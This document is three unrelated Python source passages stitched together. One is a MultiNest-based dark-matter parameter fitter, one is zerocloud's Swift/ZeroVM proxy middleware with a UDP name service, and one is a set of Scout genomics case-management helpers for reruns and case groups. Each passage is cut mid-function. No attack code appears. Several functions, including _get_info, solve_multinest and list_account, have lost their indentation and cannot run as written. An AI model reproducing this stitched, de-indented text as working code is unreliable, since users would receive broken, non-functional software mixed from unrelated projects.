            # Prior transform of a flat prior is a simple line.
            return x * (b - a) + a
        if prior_type == 'gauss':
            # Get the range from the config file
            a, b = this_prior['range']
            m, s = this_prior['param']

            # Here the prior transform is being constructed and shifted. This may not seem trivial
            # and one is advised to request a notebook where this is explained
            # from the developer(s).
            aprime = spsp.ndtr((a - m) / s)
            bprime = spsp.ndtr((b - m) / s)
            xprime = x * (bprime - aprime) + aprime
            return m + s * spsp.ndtri(xprime)
        raise ValueError(f"unknown prior type '{prior_type}'")

    def _log_probability_nested(self, theta):
        """Positional-only wrapper of log_probability_nested for MultiNest."""
        ndim = len(theta)
        return self.log_probability_nested(
            theta, self.known_parameters[:ndim])

    def _log_prior_transform_nested(self, theta):
        """Apply the per-parameter prior transform to the whole vector."""
        result = [
            self.log_prior_transform_nested(val, self.known_parameters[i])
            for i, val in enumerate(theta)]
        return np.array(result)

    def _print_before_run(self):
        """Log a final overview of all set options before sampling starts."""
        self.log.warning(
            f"""
            --------------------------------------------------
            {dddm.utils.now()}\n\tFinal print of all of the set options:
            self.log = {self.log}
            self.result = {self.result}
            self.benchmark_values = {np.array(self.benchmark_values)}
            self.config = {self.config}
            --------------------------------------------------
            """
        )

    def run(self):
        """Run the MultiNest fit and record the fit time in the config."""
        self._fix_parameters()
        self._print_before_run()
        try:
            # imported only to fail fast with a clear message when
            # pymultinest is not installed
            from pymultinest.solve import run, Analyzer, solve
        except ModuleNotFoundError as e:
            raise ModuleNotFoundError(
                'package pymultinest not found. See README') from e
        n_dims = len(self.config["fit_parameters"])
        tol = self.config['tol']  # the stopping criterion
        save_at = self.get_save_dir()

        self.log.warning(f'start_fit for {n_dims} parameters')

        start = datetime.datetime.now()

        # Multinest saves output to a folder. First write to the tmp folder,
        # move it to the results folder later
        _tmp_folder = self.get_save_dir()
        save_at_temp = os.path.join(_tmp_folder, 'multinest')

        solve_multinest(
            LogLikelihood=self._log_probability_nested,  # SafeLoglikelihood,
            Prior=self._log_prior_transform_nested,  # SafePrior,
            n_live_points=self.config['nlive'],
            n_dims=n_dims,
            outputfiles_basename=save_at_temp,
            verbose=True,
            evidence_tolerance=tol,
            # null_log_evidence=dddm.statistics.LL_LOW_BOUND,
            max_iter=self.config.get('max_iter', 0),
        )
        self.result_file = save_at_temp

        # Open a save-folder after successful running multinest. Move the
        # multinest results there.
        dddm.utils.check_folder_for_file(save_at)
        end = datetime.datetime.now()
        dt = (end - start).total_seconds()
        self.log.info(f'fit_done in {dt} s ({dt / 3600} h)')
        self.log_dict['did_run'] = True
        # release the config
        self.config = dddm.utils._immutable_to_dict(self.config)
        self.config['fit_time'] = dt
        self.log.info('Finished with running Multinest!')

    def get_summary(self):
        """Analyze the MultiNest output and return a summary dict holding
        per-parameter fit strings, the best fit, covariance matrix and
        sample count; also stores the posterior samples on self.result."""
        self.log.info(
            "getting the summary (or at least trying) let's first see if I did run"
        )
        self.check_did_run()
        # keep a dictionary of all the results
        resdict = {}
        # Do the import of multinest inside the class such that the package can be
        # loaded without multinest
        try:
            from pymultinest.solve import run, Analyzer, solve
        except ModuleNotFoundError:
            raise ModuleNotFoundError(
                'package pymultinest not found. See README for installation')
        self.log.info('start analyzer of results')
        analyzer = Analyzer(len(self.config['fit_parameters']),
                            outputfiles_basename=self.result_file)
        # Taken from multinest.solve
        self.result = analyzer.get_stats()
        samples = analyzer.get_equal_weighted_posterior()[:, :-1]
        self.log.info('parameter values:')
        for name, col in zip(self.config['fit_parameters'],
                             samples.transpose()):
            self.log.info(
                '%15s : %.3f +- %.3f' %
                (name, col.mean(), col.std()))
            resdict[name + '_fit_res'] = (
                '{0:5.2f} +/- {1:5.2f}'.format(col.mean(), col.std()))
            if 'log_' in name:
                # also report log-scale parameters on a linear scale
                resdict[name[4:] + '_fit_res'] = '%.3g +/- %.2g' % (
                    10. ** col.mean(), 10. ** (col.mean()) * np.log(10.) * col.std())
                self.log.info(f'\t {name[4:]},'
                              f' {resdict[name[4:] + "_fit_res"]}')
        resdict['best_fit'] = np.mean(samples.transpose(), axis=1)
        print(resdict['best_fit'])
        resdict['cov_matrix'] = np.cov(samples.transpose())
        print(resdict['cov_matrix'])
        resdict['n_samples'] = len(samples.transpose()[0])
        # Pass the samples to the self.result to be saved.
        self.result['samples'] = samples
        self.log.info('Alright we got all the info we need')
        return resdict

    def get_save_dir(self, force_index=False, _hash=None) -> str:
        """Return (and cache in log_dict) the directory to save results in."""
        saved_in = self.log_dict['saved_in']
        saved_ok = isinstance(saved_in, str) and os.path.exists(saved_in)
        if saved_ok and not force_index:
            return saved_in
        target_save = dddm.context.open_save_dir(
            f'nes_{self.__class__.__name__[:3]}',
            base_dir=self.results_dir,
            force_index=force_index,
            _hash=_hash)
        self.log_dict['saved_in'] = target_save
        self.log.info(f'get_save_dir\tsave_dir = {target_save}')
        return target_save

    def save_results(self, force_index=False):
        """Persist config, summary and posterior samples to the save dir."""
        self.log.info('Saving results after checking we did run')
        # save fit parameters to config
        self.check_did_run()
        save_dir = self.get_save_dir(force_index=force_index)
        fit_summary = self.get_summary()
        self.log.info(f'storing in {save_dir}')
        # save the config, chain and flattened chain
        pid_id = 'pid' + str(os.getpid()) + '_'
        with open(os.path.join(save_dir, f'{pid_id}config.json'), 'w') as file:
            json.dump(convert_dic_to_savable(self.config), file, indent=4)
        with open(os.path.join(save_dir, f'{pid_id}res_dict.json'), 'w') as file:
            json.dump(convert_dic_to_savable(fit_summary), file, indent=4)
        np.save(
            os.path.join(save_dir, f'{pid_id}config.npy'),
            convert_dic_to_savable(self.config))
        np.save(os.path.join(save_dir, f'{pid_id}res_dict.npy'),
                convert_dic_to_savable(fit_summary))
        # NOTE(review): `col` below is a dict *key* (a str), so
        # `not isinstance(col, dict)` is always True and the else branch
        # is unreachable -- presumably `self.result[col]` was meant;
        # confirm before changing, since fixing it would alter how
        # dict-valued results are serialized.
        for col in self.result.keys():
            if col == 'samples' or not isinstance(col, dict):
                if col == 'samples':
                    # in contrast to nestle, multinest returns the weighted
                    # samples.
                    store_at = os.path.join(save_dir,
                                            f'{pid_id}weighted_samples.npy')
                else:
                    store_at = os.path.join(
                        save_dir,
                        pid_id + col + '.npy')
                np.save(store_at, self.result[col])
            else:
                np.save(os.path.join(save_dir, pid_id + col + '.npy'),
                        convert_dic_to_savable(self.result[col]))
        if 'logging' in self.config:
            # keep a copy of the log file next to the results
            store_at = os.path.join(save_dir,
                                    self.config['logging'].split('/')[-1])
            shutil.copy(self.config['logging'], store_at)
        self.log.info('save_results::\tdone_saving')

    def show_corner(self):
        """Load the saved results and draw a corner plot of the posterior."""
        self.check_did_save()
        save_dir = self.log_dict['saved_in']
        combined_results = load_multinest_samples_from_file(save_dir)
        multinest_corner(combined_results, save_dir)
        self.log.info('Enjoy the plot. Maybe you do want to save it too?')
def convert_dic_to_savable(config):
    """Recursively convert `config` into a json/np.save-friendly dict.

    immutabledicts become plain dicts, numpy arrays become lists, numpy
    scalar types become native ints/floats, and any remaining value the
    dddm helpers do not consider savable is stringified.
    """
    if isinstance(config, immutabledict):
        out = dict(config.items())
    else:
        out = config.copy()
    for key, value in out.items():
        if dddm.utils.is_savable_type(value):
            continue
        if isinstance(value, (dict, immutabledict)):
            out[key] = convert_dic_to_savable(value)
        elif isinstance(value, np.ndarray):
            out[key] = value.tolist()
        elif isinstance(value, np.integer):
            out[key] = int(value)
        elif isinstance(value, np.floating):
            out[key] = float(value)
        else:
            out[key] = str(value)
    return out
def load_multinest_samples_from_file(load_dir):
    """Load every saved '.npy' result file in `load_dir` into a dict,
    keyed by the file name with the pid prefix and extension stripped."""
    result = {}
    for entry in os.listdir(load_dir):
        path = os.path.join(load_dir, entry)
        if not os.path.isfile(path) or '.npy' not in entry:
            continue
        naked_key = do_strip_from_pid(entry.split('.npy')[0])
        payload = np.load(path, allow_pickle=True)
        if naked_key in ('config', 'res_dict'):
            # dict payloads were stored as 0-d object arrays
            result[naked_key] = payload.item()
        else:
            result[naked_key] = payload
    return result
def do_strip_from_pid(string):
    """Remove a leading ``pid<nnn>_`` identifier from a file-name stem.

    Only strips when the string actually *starts* with 'pid'; the
    previous ``'pid' in string`` test also mangled names that merely
    contain 'pid' somewhere (e.g. 'rapid_scan' -> 'scan').

    :param string: file-name stem, e.g. 'pid1234_config'
    :return: the stem without the pid prefix, e.g. 'config'
    """
    if not string.startswith('pid'):
        return string
    return "_".join(string.split("_")[1:])
def _get_info(result, _result_key):
info = r"$M_\chi}$=%.2f" % 10. ** np.float64(result['config']['log_mass'])
for prior_key in result['config']['prior'].keys():
if (prior_key in result['config']['prior'] and
'mean' in result['config']['prior'][prior_key]):
mean = result['config']['prior'][prior_key]['mean']
info += f"\n{prior_key} = {mean}"
nposterior, ndim = np.shape(result[_result_key])
info += "\nnposterior = %s" % nposterior
for str_inf in ['detector', 'notes', 'start', 'fit_time', 'poisson',
'n_energy_bins']:
if str_inf in result['config']:
info += f"\n{str_inf} = %s" % result['config'][str_inf]
if str_inf == 'start':
info = info[:-7]
if str_inf == 'fit_time':
info += 's (%.1f h)' % (float(result['config'][str_inf]) / 3600.)
return info, ndim
def multinest_corner(
        result,
        save=False,
        _result_key='weighted_samples',
        _weights=False):
    """Draw a corner plot of the posterior samples held in `result`,
    optionally saving it as '<save>corner.png'."""
    info, ndim = _get_info(result, _result_key)
    labels = dddm.statistics.get_param_list()[:ndim]
    truths = []
    for prior_name in dddm.statistics.get_prior_list()[:ndim]:
        key = 'density' if prior_name == "rho_0" else prior_name
        if key in result['config']:
            truths.append(result['config'][key])
        else:
            truths.append(result['config']['prior'][key]['mean'])
    corner_kwargs = dict(
        labels=labels,
        range=([0.99999] * 5)[:ndim],
        truths=truths,
        show_titles=True)
    if _weights:
        corner_kwargs['weights'] = result['weights']
    fig = corner.corner(result[_result_key], **corner_kwargs)
    fig.axes[1].set_title('Fit title', loc='left')
    fig.axes[1].text(0, 1, info, verticalalignment='top')
    if save:
        plt.savefig(f"{save}corner.png", dpi=200)
def solve_multinest(LogLikelihood, Prior, n_dims, **kwargs):
"""
See PyMultinest Solve() for documentation
"""
from pymultinest.solve import run, Analyzer
kwargs['n_dims'] = n_dims
files_temporary = False
if 'outputfiles_basename' not in kwargs:
files_temporary = True
tempdir = tempfile.mkdtemp('pymultinest')
kwargs['outputfiles_basename'] = tempdir + '/'
outputfiles_basename = kwargs['outputfiles_basename']
def SafePrior(cube, ndim, nparams):
a = np.array([cube[i] for i in range(n_dims)])
b = Prior(a)
for i in range(n_dims):
cube[i] = b[i]
def SafeLoglikelihood(cube, ndim, nparams, lnew):
a = np.array([cube[i] for i in range(n_dims)])
likelihood = float(LogLikelihood(a))
if not np.isfinite(likelihood):
| |
<filename>zerocloud/proxyquery.py
from copy import deepcopy
import ctypes
from itertools import chain
import re
import struct
import traceback
import time
import datetime
from urllib import unquote
import uuid
from hashlib import md5
from random import randrange, choice
import greenlet
from eventlet import GreenPile
from eventlet import GreenPool
from eventlet import Queue
from eventlet import spawn_n
from eventlet.green import socket
from eventlet.timeout import Timeout
import zlib
from swift.common.storage_policy import POLICIES
from swift.common.request_helpers import get_sys_meta_prefix
from swift.common.wsgi import make_subrequest
from swiftclient.client import quote
from swift.common.http import HTTP_CONTINUE
from swift.common.http import is_success
from swift.common.http import HTTP_INSUFFICIENT_STORAGE
from swift.common.http import is_client_error
from swift.common.http import HTTP_NOT_FOUND
from swift.common.http import HTTP_REQUESTED_RANGE_NOT_SATISFIABLE
from swift.proxy.controllers.base import update_headers
from swift.proxy.controllers.base import delay_denial
from swift.proxy.controllers.base import cors_validation
from swift.proxy.controllers.base import get_info
from swift.proxy.controllers.base import close_swift_conn
from swift.common.utils import split_path
from swift.common.utils import get_logger
from swift.common.utils import TRUE_VALUES
from swift.common.utils import get_remote_client
from swift.common.utils import ContextPool
from swift.common.utils import cache_from_env
from swift.common.utils import normalize_timestamp
from swift.common.utils import GreenthreadSafeIterator
from swift.proxy.server import ObjectController
from swift.proxy.server import ContainerController
from swift.proxy.server import AccountController
from swift.common.bufferedhttp import http_connect
from swift.common.exceptions import ConnectionTimeout
from swift.common.exceptions import ChunkReadTimeout
from swift.common.constraints import check_utf8
from swift.common.constraints import MAX_FILE_SIZE
from swift.common.constraints import MAX_HEADER_SIZE
from swift.common.constraints import MAX_META_NAME_LENGTH
from swift.common.constraints import MAX_META_VALUE_LENGTH
from swift.common.constraints import MAX_META_COUNT
from swift.common.constraints import MAX_META_OVERALL_SIZE
from swift.common.swob import Request
from swift.common.swob import Response
from swift.common.swob import HTTPNotFound
from swift.common.swob import HTTPPreconditionFailed
from swift.common.swob import HTTPRequestTimeout
from swift.common.swob import HTTPRequestEntityTooLarge
from swift.common.swob import HTTPBadRequest
from swift.common.swob import HTTPUnprocessableEntity
from swift.common.swob import HTTPServiceUnavailable
from swift.common.swob import HTTPClientDisconnect
from swift.common.swob import wsgify
from swift.common.swob import HTTPNotImplemented
from swift.common.swob import HeaderKeyDict
from swift.common.swob import HTTPException
from zerocloud import load_server_conf
from zerocloud.common import CLUSTER_CONFIG_FILENAME
from zerocloud.common import NODE_CONFIG_FILENAME
from zerocloud import TAR_MIMES
from zerocloud import POST_TEXT_OBJECT_SYSTEM_MAP
from zerocloud import POST_TEXT_ACCOUNT_SYSTEM_MAP
from zerocloud import merge_headers
from zerocloud import DEFAULT_EXE_SYSTEM_MAP
from zerocloud import STREAM_CACHE_SIZE
from zerocloud.common import parse_location
from zerocloud import can_run_as_daemon
from zerocloud.common import SwiftPath
from zerocloud.common import ImagePath
from zerocloud import TIMEOUT_GRACE
from zerocloud.configparser import ClusterConfigParser
from zerocloud.configparser import ClusterConfigParsingError
from zerocloud.tarstream import StringBuffer
from zerocloud.tarstream import UntarStream
from zerocloud.tarstream import TarStream
from zerocloud.tarstream import REGTYPE
from zerocloud.tarstream import BLOCKSIZE
from zerocloud.tarstream import NUL
from zerocloud.tarstream import ExtractedFile
from zerocloud.tarstream import Path
from zerocloud.tarstream import ReadError
from zerocloud.thread_pool import Zuid
ZEROVM_COMMANDS = ['open', 'api']
ZEROVM_EXECUTE = 'x-zerovm-execute'
try:
import simplejson as json
except ImportError:
import json
STRIP_PAX_HEADERS = ['mtime']
# Monkey patching Request to support content_type property properly
def _req_content_type_property():
"""
Set and retrieve Request.content_type
Strips off any charset when retrieved
"""
def getter(self):
if 'content-type' in self.headers:
return self.headers.get('content-type').split(';')[0]
def setter(self, value):
self.headers['content-type'] = value
return property(getter, setter,
doc="Retrieve and set the request Content-Type header")
# Install the charset-stripping property on swob's Request class.
Request.content_type = _req_content_type_property()
def check_headers_metadata(new_req, headers, target_type, req, add_all=False):
    """Validate and copy metadata headers from `headers` onto `new_req`.

    Enforces swift's metadata constraints (name length, value length,
    item count, overall size) for headers named
    'x-<target_type>-meta-*'.  With `add_all`, non-metadata headers are
    copied too, except pax headers in STRIP_PAX_HEADERS and internal
    'x-nexe-*' headers.

    :param new_req: request the validated headers are copied onto
    :param headers: mapping of header name -> value to check
    :param target_type: e.g. 'object' or 'container'; selects the prefix
    :param req: original request, referenced by error responses
    :param add_all: also copy non-metadata headers (minus exclusions)
    :raises HTTPBadRequest: on any constraint violation
    """
    prefix = 'x-%s-meta-' % target_type.lower()
    meta_count = 0
    meta_size = 0
    for key, value in headers.iteritems():
        if isinstance(value, basestring) and len(value) > MAX_HEADER_SIZE:
            raise HTTPBadRequest(body='Header value too long: %s' %
                                 key[:MAX_META_NAME_LENGTH],
                                 request=req, content_type='text/plain')
        if not key.lower().startswith(prefix):
            # not user metadata: copy it only in add_all mode, and never
            # copy stripped pax headers or internal x-nexe-* headers
            if add_all and key.lower() not in STRIP_PAX_HEADERS and not \
                    key.lower().startswith('x-nexe-'):
                new_req.headers[key] = value
            continue
        new_req.headers[key] = value
        # strip the prefix; the remainder is the user-visible meta name
        key = key[len(prefix):]
        if not key:
            raise HTTPBadRequest(body='Metadata name cannot be empty',
                                 request=req, content_type='text/plain')
        meta_count += 1
        meta_size += len(key) + len(value)
        if len(key) > MAX_META_NAME_LENGTH:
            raise HTTPBadRequest(
                body='Metadata name too long: %s%s' % (prefix, key),
                request=req, content_type='text/plain')
        elif len(value) > MAX_META_VALUE_LENGTH:
            raise HTTPBadRequest(
                body='Metadata value longer than %d: %s%s' % (
                    MAX_META_VALUE_LENGTH, prefix, key),
                request=req, content_type='text/plain')
        elif meta_count > MAX_META_COUNT:
            raise HTTPBadRequest(
                body='Too many metadata items; max %d' % MAX_META_COUNT,
                request=req, content_type='text/plain')
        elif meta_size > MAX_META_OVERALL_SIZE:
            raise HTTPBadRequest(
                body='Total metadata too large; max %d'
                % MAX_META_OVERALL_SIZE,
                request=req, content_type='text/plain')
def is_zerocloud_request(version, account, headers):
    """Return a truthy value when the request should be handled by
    zerocloud: an account must be present, and the request must either
    carry the x-zerovm-execute header or use a zerovm URL version."""
    if not account:
        return account
    return ZEROVM_EXECUTE in headers or version in ZEROVM_COMMANDS
class GreenPileEx(GreenPile):
    """Pool with iterator semantics. Good for I/O-related tasks.

    Extends eventlet's GreenPile with a ``current`` slot so that a
    next() interrupted by an exception can be retried: the waiter whose
    result was being awaited is kept instead of being lost.
    """
    def __init__(self, size_or_pool=1000):
        super(GreenPileEx, self).__init__(size_or_pool)
        # waiter currently being awaited; survives an interrupted next()
        self.current = None

    def next(self):
        """Wait for the next result, suspending the current greenthread until it
        is available. Raises StopIteration when there are no more results."""
        if self.counter == 0 and self.used:
            raise StopIteration()
        try:
            if not self.current:
                self.current = self.waiters.get()
            res = self.current.wait()
            self.current = None
            return res
        finally:
            # only consume a result slot once the waiter has actually
            # delivered (self.current cleared); an interrupted wait keeps
            # both the waiter and the counter for a retry
            if not self.current:
                self.counter -= 1
class CachedBody(object):
    """Implements caching and iterative consumption of large bodies.
    Typical (and currently, the only) uses are for managing large tarball or
    script submissions from the user. The reason why we do this is because user
    submitted content is allowed to be any size--so we don't want to hold, for
    example, an entire 5GiB tarball in memory.
    CachedBody is iterable. The ``cache`` parameter contains at all times the
    "head", while the ``read_iter`` contains the "tail".
    """

    def __init__(self, read_iter, cache=None, cache_size=STREAM_CACHE_SIZE,
                 total_size=None):
        """
        :param read_iter:
            A stream iterable.
        :param list cache:
            Defaults to None. If ``cache`` is None, constructing a `CachedBody`
            object will initialize the ``cache`` and read _at least_
            ``cache_size`` bytes from ``read_iter`` and store them in
            ``cache``. In other words, the beginning of a stream.
            If a ``cache`` is specified, this can represent the intermediate
            state of a cached body, where something is already in the cache. In
            other words, "mid-stream".
        :param int cache_size:
            Minimum amount of bytes to cache from ``read_iter``. Note: If the
            size of each chunk from ``read_iter`` is greater than
            ``cache_size``, the actual amount of bytes cached in ``cache`` will
            be the chunk size.
        :param int total_size:
            (In bytes.) If ``total_size`` is set, iterate over the
            ``read_iter`` stream until ``total_size`` counts down to 0.
            Else, just read chunks until ``read_iter`` raises a
            `StopIteration`.
        """
        self.read_iter = read_iter
        self.total_size = total_size
        if cache:
            self.cache = cache
        else:
            self.cache = []
            size = 0
            # pre-read at least cache_size bytes so the stream head can
            # be replayed later
            for chunk in read_iter:
                self.cache.append(chunk)
                size += len(chunk)
                if size >= cache_size:
                    break

    def __iter__(self):
        if self.total_size:
            # bounded mode: emit exactly total_size bytes.  total_size is
            # decremented per chunk; once it goes negative,
            # chunk[:self.total_size] (a negative slice bound) trims the
            # overshoot off the end of the final chunk.
            for chunk in self.cache:
                self.total_size -= len(chunk)
                if self.total_size < 0:
                    yield chunk[:self.total_size]
                    break
                else:
                    yield chunk
            if self.total_size > 0:
                # the cache alone did not cover total_size: continue with
                # the tail of the stream, same countdown logic
                for chunk in self.read_iter:
                    self.total_size -= len(chunk)
                    if self.total_size < 0:
                        yield chunk[:self.total_size]
                        break
                    else:
                        yield chunk
                # drain whatever remains of the source stream
                for _junk in self.read_iter:
                    pass
        else:
            # unbounded mode: replay the cached head, then stream the rest
            for chunk in self.cache:
                yield chunk
            for chunk in self.read_iter:
                yield chunk
class FinalBody(object):
    """Concatenation of response-body iterables, consumed in order."""

    def __init__(self, app_iter):
        self.app_iters = [app_iter]

    def __iter__(self):
        """Yield every chunk of every appended iterable, in order."""
        return chain.from_iterable(self.app_iters)

    def append(self, app_iter):
        """Add another iterable to be consumed after the current ones."""
        self.app_iters.append(app_iter)
class NameService(object):
    """DNS-like server using a binary protocol.
    This is usable only with ZeroMQ-based networking for ZeroVM, and not
    zbroker.
    DNS resolves names to IPs; this name service resolves IDs to IP+port.
    """
    # INTEGER (4 bytes)
    INT_FMT = '!I'
    # INTEGER (4 bytes) + HOST (2 bytes)
    INPUT_RECORD_FMT = '!IH'
    # 4 bytes of string + HOST (2 bytes)
    OUTPUT_RECORD_FMT = '!4sH'
    INT_SIZE = struct.calcsize(INT_FMT)
    INPUT_RECORD_SIZE = struct.calcsize(INPUT_RECORD_FMT)
    OUTPUT_RECORD_SIZE = struct.calcsize(OUTPUT_RECORD_FMT)

    def __init__(self, peers):
        """
        :param int peers:
            Number of ZeroVM instances that will contact this name server.
        """
        self.port = None
        self.hostaddr = None
        self.peers = peers
        self.sock = None
        self.thread = None
        # peer_id -> {connecting_host: port} for each advertised bind
        self.bind_map = {}
        # peer_id -> (connect_count, offset, mutable copy of its datagram)
        self.conn_map = {}
        # peer_id -> {0: ip, 1: port} of the peer's own UDP address
        self.peer_map = {}
        self.int_pool = GreenPool()

    def start(self, pool):
        """
        :param pool:
            `GreenPool` instance
        """
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        # bind to any port, any address
        self.sock.bind(('', 0))
        self.thread = pool.spawn(self._run)
        (self.hostaddr, self.port) = self.sock.getsockname()

    def _run(self):
        # Datagram layout received from each peer:
        #   peer_id, bind_count, connect_count        (3 x INT_FMT)
        #   bind_count x (connecting_host, port)      (INPUT_RECORD_FMT each)
        #   connect_count x host-id records           (rewritten below)
        # Once every expected peer has reported, each peer's own datagram
        # is echoed back with the connect records overwritten in place by
        # the (ip, port) pairs it should connect to.
        while 1:
            try:
                message, peer_address = self.sock.recvfrom(65535)
                offset = 0
                peer_id = struct.unpack_from(NameService.INT_FMT, message,
                                             offset)[0]
                offset += NameService.INT_SIZE
                bind_count = struct.unpack_from(NameService.INT_FMT, message,
                                                offset)[0]
                offset += NameService.INT_SIZE
                connect_count = struct.unpack_from(NameService.INT_FMT,
                                                   message, offset)[0]
                offset += NameService.INT_SIZE
                for i in range(bind_count):
                    connecting_host, port = struct.unpack_from(
                        NameService.INPUT_RECORD_FMT, message, offset)[0:2]
                    offset += NameService.INPUT_RECORD_SIZE
                    self.bind_map.setdefault(peer_id, {})[connecting_host] = \
                        port
                # keep a mutable copy of the datagram so the connect
                # records can be patched in place when replying
                self.conn_map[peer_id] = (connect_count,
                                          offset,
                                          ctypes.create_string_buffer(
                                              message[:]))
                # peer_address[0] == ip
                self.peer_map.setdefault(peer_id, {})[0] = peer_address[0]
                # peer_address[1] == port
                self.peer_map.setdefault(peer_id, {})[1] = peer_address[1]
                if len(self.peer_map) == self.peers:
                    # every peer has reported: resolve and answer all
                    for peer_id in self.peer_map.iterkeys():
                        (connect_count, offset, reply) = self.conn_map[peer_id]
                        for i in range(connect_count):
                            connecting_host = struct.unpack_from(
                                NameService.INT_FMT, reply, offset)[0]
                            port = self.bind_map[connecting_host][peer_id]
                            connect_to = self.peer_map[connecting_host][0]
                            if connect_to == self.peer_map[peer_id][0]:
                                # both on the same host
                                connect_to = '127.0.0.1'
                            struct.pack_into(NameService.OUTPUT_RECORD_FMT,
                                             reply, offset,
                                             socket.inet_pton(socket.AF_INET,
                                                              connect_to),
                                             port)
                            offset += NameService.OUTPUT_RECORD_SIZE
                        self.sock.sendto(reply, (self.peer_map[peer_id][0],
                                                 self.peer_map[peer_id][1]))
            except greenlet.GreenletExit:
                return
            except Exception:
                print traceback.format_exc()
                pass

    def stop(self):
        """Kill the server greenthread and close the UDP socket."""
        self.thread.kill()
        self.sock.close()
class ProxyQueryMiddleware(object):
def list_account(self, account, mask=None, marker=None, request=None):
new_req = request.copy_get()
new_req.path_info = '/' + quote(account)
new_req.query_string = 'format=json'
if marker:
new_req.query_string += '&marker=' + marker
resp = AccountController(self.app, account).GET(new_req)
if resp.status_int == 204:
data = resp.body
return []
if resp.status_int < 200 or resp.status_int >= 300:
raise Exception('Error querying object server')
data = json.loads(resp.body)
if marker:
return data
ret = []
while data:
for item in data:
if not mask or mask.match(item['name']):
ret.append(item['name'])
marker = data[-1]['name']
data = self.list_account(account, mask=None, marker=marker,
request=request)
return ret
def list_container(self, account, container, mask=None, marker=None,
request=None):
new_req | |
diseases
except RuntimeError:
flash("Could not establish a conection to Phenomizer", "danger")
def rerun(store, mail, current_user, institute_id, case_name, sender, recipient):
    """Request a rerun by email.

    Marks the case as rerun-requested in the database and mails the
    configured recipient; flashes a notice instead when a rerun is
    already pending.
    """
    institute_obj, case_obj = institute_and_case(store, institute_id, case_name)
    user_obj = store.user(current_user.email)
    link = url_for("cases.case", institute_id=institute_id, case_name=case_name)
    if case_obj.get("rerun_requested") and case_obj["rerun_requested"] is True:
        flash("Rerun already pending", "info")
        return
    store.request_rerun(institute_obj, case_obj, user_obj, link)
    # this should send a JSON document to the SuSy API in the future
    html = """
    <p>{institute}: {case} ({case_id})</p>
    <p>Re-run requested by: {name}</p>
    """.format(
        institute=institute_obj["display_name"],
        case=case_obj["display_name"],
        case_id=case_obj["_id"],
        # bug fix: .encode() returned bytes, so the rendered message
        # contained a "b'...'" repr of the user name under Python 3
        name=user_obj["name"],
    )
    # compose and send the email message
    msg = Message(
        subject=("SCOUT: request RERUN for {}".format(case_obj["display_name"])),
        html=html,
        sender=sender,
        recipients=[recipient],
        # cc the sender of the email for confirmation
        cc=[user_obj["email"]],
    )
    if recipient:
        mail.send(msg)
    else:
        LOG.error("Cannot send rerun message: no recipient defined in config.")
def call_rerunner(store, institute_id, case_name, metadata):
    """Trigger reanalysis of a case via the rerunner API, posting the
    updated pedigree metadata; raises on configuration or HTTP errors."""
    # define the data to be passed
    payload = {"case_id": case_name,
               "sample_ids": [sample["sample_id"] for sample in metadata]}
    settings = rerunner.connection_settings
    url = settings.get("entrypoint")
    if not url:
        raise ValueError("Rerunner API entrypoint not configured")
    credentials = HTTPBasicAuth(current_user.email, settings.get("api_key"))
    LOG.info(f"Sending request -- {url}; params={payload}")
    resp = requests.post(
        url,
        params=payload,
        json=metadata,
        timeout=rerunner.timeout,
        headers={"Content-Type": "application/json"},
        auth=credentials,
    )
    if resp.status_code != 200:
        raise RerunnerError(f"{resp.reason}, {resp.status_code}")
    LOG.info(f"Reanalysis was successfully started; case: {case_name}")
    # record the rerun request on the case for the audit trail
    institute_obj, case_obj = institute_and_case(store, institute_id, case_name)
    user_obj = store.user(current_user.email)
    link = url_for("cases.case", institute_id=institute_id, case_name=case_name)
    store.request_rerun(institute_obj, case_obj, user_obj, link)
    # notfiy the user of the rerun
    flash(f"Reanalysis was successfully started; case: {case_name}", "info")
def update_default_panels(store, current_user, institute_id, case_name, panel_ids):
    """Make the panels named in `panel_ids` the default panels of a case."""
    institute_obj, case_obj = institute_and_case(store, institute_id, case_name)
    user_obj = store.user(current_user.email)
    link = url_for("cases.case", institute_id=institute_id, case_name=case_name)
    panel_objs = []
    for panel_id in panel_ids:
        panel_objs.append(store.panel(panel_id))
    store.update_default_panels(institute_obj, case_obj, user_obj, link, panel_objs)
def update_clinical_filter_hpo(store, current_user, institute_id, case_name, hpo_clinical_filter):
    """Update HPO clinical filter use for a case."""
    inst_obj, case_obj = institute_and_case(store, institute_id, case_name)
    editor = store.user(current_user.email)
    case_url = url_for("cases.case", institute_id=institute_id, case_name=case_name)
    store.update_clinical_filter_hpo(inst_obj, case_obj, editor, case_url, hpo_clinical_filter)
def add_case_group(store, current_user, institute_id, case_name, group=None):
    """Bind a case group in a selected case, creating it in the current institute if not given.

    Args:
        store: database adapter
        current_user (user): current user
        institute_id (str): institute id
        case_name (str): case display name
        group (str): case group id - converts to ObjectId

    Returns:
        updated_case (InsertOneResult)
    """
    institute_obj, case_obj = institute_and_case(store, institute_id, case_name)
    link = url_for("cases.case", institute_id=institute_id, case_name=case_name)
    user_obj = store.user(current_user.email)
    if not group:
        # No group given: create a fresh case group in this institute.
        group = store.init_case_group(institute_id)
    # Group ids are kept as ObjectIds; use a set to avoid duplicate bindings.
    current_group_ids = set(case_obj.get("group", []))
    current_group_ids.add(ObjectId(group))
    updated_case = store.update_case_group_ids(
        institute_obj, case_obj, user_obj, link, list(current_group_ids)
    )
    return updated_case
def remove_case_group(store, current_user, institute_id, case_name, case_group):
    """Remove a case group from selected institute - and from db if it is no longer in use."""
    institute_obj, case_obj = institute_and_case(store, institute_id, case_name)
    link = url_for("cases.case", institute_id=institute_id, case_name=case_name)
    user_obj = store.user(current_user.email)
    current_group_ids = case_obj.get("group", [])
    # Group ids are stored as ObjectIds, the incoming id is a string.
    # NOTE(review): list.remove raises ValueError if the group is not bound
    # to the case — TODO confirm callers only pass bound groups.
    current_group_ids.remove(ObjectId(case_group))
    updated_case = store.update_case_group_ids(
        institute_obj, case_obj, user_obj, link, current_group_ids
    )
    # Drop the group document entirely once no case references it anymore.
    # (Truthiness test instead of `== []` so any empty iterable counts.)
    if not store.case_ids_from_group_id(case_group):
        store.remove_case_group(case_group)
    return updated_case
def case_group_update_label(store, case_group_id, case_group_label):
    """Update a case group label.

    Args:
        store: database adapter
        case_group_id (str): id of the case group - converts to ObjectId
        case_group_label (str): the new label

    Returns:
        result: outcome of the update operation
    """
    result = store.case_group_update_label(ObjectId(case_group_id), case_group_label)
    return result
def vcf2cytosure(store, institute_id, case_name, individual_id):
    """vcf2cytosure CGH file for individual.

    Args:
